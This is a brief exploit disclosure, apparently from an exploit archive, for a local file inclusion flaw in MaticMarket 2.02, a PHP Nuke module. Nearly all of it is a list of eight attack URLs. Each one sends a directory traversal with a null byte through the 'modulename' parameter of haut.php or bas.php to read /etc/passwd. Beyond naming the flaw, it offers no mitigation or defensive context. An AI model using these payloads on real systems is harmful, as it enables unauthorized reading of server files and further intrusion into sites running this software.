MaticMarket version 2.02 for PHP Nuke suffers from a local file inclusion vulnerability.
ffcb785ed6463a219582688ec2e05992bdfd9d8b261b4b60855f9c567405504a
#MaticMarket 2.02 for PHP Nuke LFI Vulnerability
#Url: http://sourceforge.net/projects/maticmarket
#Author: xer0x
#Expl:
http://localhost/modules/maticmarket/deco/blanc/haut.php?modulename=../../../../../../../../../../../../../../etc/passwd%00
http://localhost/modules/maticmarket/deco/blanc/bas.php?modulename=../../../../../../../../../../../../../../etc/passwd%00
http://localhost/modules/maticmarket/bleu/blanc/haut.php?modulename=../../../../../../../../../../../../../../etc/passwd%00
http://localhost/modules/maticmarket/bleu/blanc/bas.php?modulename=../../../../../../../../../../../../../../etc/passwd%00
http://localhost/modules/maticmarket/bleu/default/haut.php?modulename=../../../../../../../../../../../../../../etc/passwd%00
http://localhost/modules/maticmarket/bleu/default/bas.php?modulename=../../../../../../../../../../../../../../etc/passwd%00
http://localhost/modules/maticmarket/bleu/gold/haut.php?modulename=../../../../../../../../../../../../../../etc/passwd%00
http://localhost/modules/maticmarket/bleu/gold/bas.php?modulename=../../../../../../../../../../../../../../etc/passwd%00